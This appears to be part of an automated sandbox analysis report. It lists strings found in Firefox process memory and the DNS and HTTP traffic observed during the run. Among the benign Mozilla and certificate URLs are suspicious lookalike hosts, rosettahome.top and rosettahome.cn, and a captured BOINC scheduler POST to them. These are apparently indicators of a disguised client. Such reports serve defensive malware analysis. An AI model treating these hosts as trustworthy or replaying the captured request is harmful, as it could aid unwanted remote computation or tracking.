Source: firefox.exe, 00000003.00000003.1525109650.000001CA1B745000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1525109650.000001CA1B738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1655358693.000001CA1B745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8*://www.youtube.com/* equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1528174370.000001CA1B18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1690517734.000001CA1B24C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1525109650.000001CA1B745000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1525109650.000001CA1B738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1655358693.000001CA1B745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1655358693.000001CA1B73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1530625461.000001CA1B740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1525109650.000001CA1B738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: moz-extension://06836808-3da5-4b66-93b7-b66b1a840a96/injections/js/bug1842437-www.youtube.com-performance-now-precision.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1931036412.000001CA0EE4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1528174370.000001CA1B18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1819855742.000001CA0C5DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1819855742.000001CA0C5DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705327159.000001CA0EE4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1747695843.000001CA0BE33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1672954302.000001CA0F12C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: example.org
Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: www.youtube.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
Source: global trafficDNS traffic detected: DNS query: www.reddit.com
Source: global trafficDNS traffic detected: DNS query: twitter.com
Source: global trafficDNS traffic detected: DNS query: dualstack.reddit.map.fastly.net
Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: services.addons.mozilla.org
Source: global trafficDNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global trafficDNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: rosettahome.top
Source: global trafficDNS traffic detected: DNS query: boinc.berkeley.edu
Source: global trafficDNS traffic detected: DNS query: rosettahome.cn
Source: unknownHTTP traffic detected: POST /rosettahome_cgi/cgi HTTP/1.1Host: rosettahome.topUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzipContent-type: text/xmlContent-Length: 5860Data Raw: 3c 73 63 68 65 64 75 6c 65 72 5f 72 65 71 75 65 73 74 3e 0a 20 20 20 20 3c 61 75 74 68 65 6e 74 69 63 61 74 6f 72 3e 31 5f 64 66 64 61 63 61 63 31 64 34 65 39 31 61 37 34 65 39 31 63 66 63 31 38 66 35 31 38 65 31 64 65 3c 2f 61 75 74 68 65 6e 74 69 63 61 74 6f 72 3e 0a 20 20 20 20 3c 68 6f 73 74 69 64 3e 30 3c 2f 68 6f 73 74 69 64 3e 0a 20 20 20 20 3c 72 70 63 5f 73 65 71 6e 6f 3e 30 3c 2f 72 70 63 5f 73 65 71 6e 6f 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 61 6a 6f 72 5f 76 65 72 73 69 6f 6e 3e 38 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 61 6a 6f 72 5f 76 65 72 73 69 6f 6e 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 69 6e 6f 72 5f 76 65 72 73 69 6f 6e 3e 30 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 69 6e 6f 72 5f 76 65 72 73 69 6f 6e 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 72 65 6c 65 61 73 65 3e 32 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 72 65 6c 65 61 73 65 3e 0a 20 20 20 20 3c 72 65 73 6f 75 72 63 65 5f 73 68 61 72 65 5f 66 72 61 63 74 69 6f 6e 3e 31 2e 30 30 30 30 30 30 3c 2f 72 65 73 6f 75 72 63 65 5f 73 68 61 72 65 5f 66 72 61 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 72 72 73 5f 66 72 61 63 74 69 6f 6e 3e 31 2e 30 30 30 30 30 30 3c 2f 72 72 73 5f 66 72 61 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 70 72 72 73 5f 66 72 61 63 74 69 6f 6e 3e 31 2e 30 30 30 30 30 30 3c 2f 70 72 72 73 5f 66 72 61 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 64 75 72 61 74 69 6f 6e 5f 63 6f 72 72 65 63 74 69 6f 6e 5f 66 61 63 74 6f 72 3e 31 2e 30 30 30 30 30 30 3c 2f 64 75 72 61 74 69 6f 6e 5f 63 6f 72 72 65 63 74 69 6f 6e 5f 66 61 63 74 6f 72 3e 0a 20 20 20 20 3c 61 6c 6c 6f 77 5f 6d 75 6c 74 69 70 6c 65 5f 63 6c 69 65 6e 74 73 3e 30 3c 2f 61 6c 6c 6f 77 5f 6d 75 6c 74 69 70 6c 65 5f 63 6c 69 65 6e 74 73 3e 0a 20 20 20 20 3c 73 61 6e 64 62 6f 78 3e 30 3c 2f 73 61 6e 64 62 6f 78 3e 0a 20 20 20 20 3c 64 6f 6e 74 5f 73 65 6e 64 5f 77 6f 72 6b 3e 30 3c 2f 64 6f 6e 74 5f 73 65 6e 64 5f 77 6f 72 6b 3e 0a 20 20 20 20 3c 77 6f 72 6b 5f 72 65 71 5f 73 65 63 6f 6e 64 73 3e 31 2e 30 30 30 30 30 30 3c 2f 77 6f 72 6b 5f 72 65 71 5f 73 65 63 6f 6e 64 73 3e 0a 20 20 20 20 3c 63 70 75 5f 72 65 71 5f 73 65 63 73 3e 31 2e 30 30 30 30 30 30 3c 2f 63 70 75 5f 72 65 71 5f 73 65 63 73 3e 0a 20 20 20 20 3c 63 70 75 5f 72 65 71 5f 69 6e 73 74 61 6e 63 65 73 3e 30 2e 30 30 30 30 30 30 3c 2f 63 70 75 5f 72 65 71 5f 69 6e 73 74 61 6e 63 65 73 3e 0a 20 20 20 20 3c 65 73 74 69 6d 61 74 65 64 5f 64 65 6c 61 79 3e 30 2e 30 30 30 30 30 30 3c 2f 65 73 74 69 6d 61 74 65 64 5f 64 65 6c 61 79 3e 0a 20 20 20 20 3c 63 6c 69 65 6e 74 5f 63 61 70 5f 70 6c 61 6e 5f 63 6c 61 73 73 3e 31 3c 2f 63 6c 69 65 6e 74 5f 63 61 70 5f 70 6c 61 6e 5f 63 6c 61 73 73 3e 0a 20 20 20 20 3c 70 6c 61 74 66 6f 72 6d 5f 6e 61 6d 65 3e 77 69 6e 64 6f 77 73 5f 78 38 36 5f 36 34 3
Source: firefox.exe, 00000003.00000003.1706743059.000001CA0EB74000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1808462601.000001CA0EB79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1931860870.000001CA0EB79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEC5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1539926673.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1522082697.000001CA0AE90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 00000003.00000003.2024417197.000001CA08575000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2022065956.000001CA09158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org
Source: firefox.exe, 00000003.00000003.2022407862.000001CA085F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/
Source: firefox.exe, 00000003.00000003.2019810702.000001CA091F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2017352863.000001CA0B176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000003.00000003.1946711213.000001CA15B56000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEC5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1539926673.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 00000003.00000003.1564754564.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1547716853.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1550444529.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1571508369.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1568029139.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1541778340.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-
Source: firefox.exe, 00000003.00000003.1562356175.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1552358255.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1566973694.000001CA0AEB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-B
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEC5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000003.00000003.1528006163.000001CA1B1EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1690943971.000001CA19CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1653304934.000001CA7FACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2013136371.000001CA0B4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000003.00000003.1808462601.000001CA0EB74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000003.00000003.1816721390.000001CA0D108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2022641145.000001CA085AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1943565059.000001CA0C518000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000003.00000003.1604714337.000001CA19C19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2022407862.000001CA085F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1755320173.000001CA0BB98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1943565059.000001CA0C518000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000003.00000003.2083718237.000001CA7CF8A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2083187983.000001CA7CF8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wA
Source: firefox.exe, 00000003.00000003.1436132963.000001CA7CF36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wikip
Source: firefox.exe, 00000003.00000003.1666117463.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1439458960.000001CA7F193000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1694765742.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1621499602.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000003.00000003.1666117463.000001CA7F181000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1440094862.000001CA7F181000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1695077522.000001CA7F181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-timesP
Source: firefox.exe, 00000003.00000003.1666117463.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1439458960.000001CA7F193000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1694765742.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1621499602.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000003.00000003.1666117463.000001CA7F181000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1440094862.000001CA7F181000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1695077522.000001CA7F181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000003.00000003.1666117463.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1439458960.000001CA7F193000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1694765742.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1621499602.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
